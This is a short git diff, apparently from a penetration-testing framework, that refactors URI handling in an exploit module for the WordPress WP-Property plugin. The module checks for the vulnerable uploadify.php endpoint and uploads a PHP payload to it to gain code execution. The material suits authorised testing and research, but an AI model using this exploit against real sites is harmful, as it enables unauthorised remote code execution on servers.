changes per firefart

grutz · grutz · commit 0b766cd41257 · 2014-03-27T10:08:44.000-07:00
diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
@@ -54,11 +54,11 @@ def initialize(info = {})
   end
 
   def check
-    uri = normalize_uri(target_uri.path)
+    uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify', 'uploadify.php')
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri'    => "#{uri}/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
+      'uri'    => uri
     })
 
     if not res or res.code != 200
@@ -69,7 +69,8 @@ def check
   end
 
   def exploit
-    uri = normalize_uri(target_uri.path)
+    data_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify/')
+    request_uri = normalize_uri(data_uri, 'uploadify.php')
 
     peer = "#{rhost}:#{rport}"
 
@@ -78,13 +79,13 @@ def exploit
 
     data = Rex::MIME::Message.new
     data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
-    data.add_part("#{uri}/wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
+    data.add_part(data_uri, nil, nil, "form-data; name=\"folder\"")
     post_data = data.to_s
 
     print_status("#{peer} - Uploading payload #{@payload_name}")
     res = send_request_cgi({
       'method' => 'POST',
-      'uri'    => "#{uri}/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
+      'uri'    => request_uri,
       'ctype'  => "multipart/form-data; boundary=#{data.bound}",
       'data'   => post_data
     })
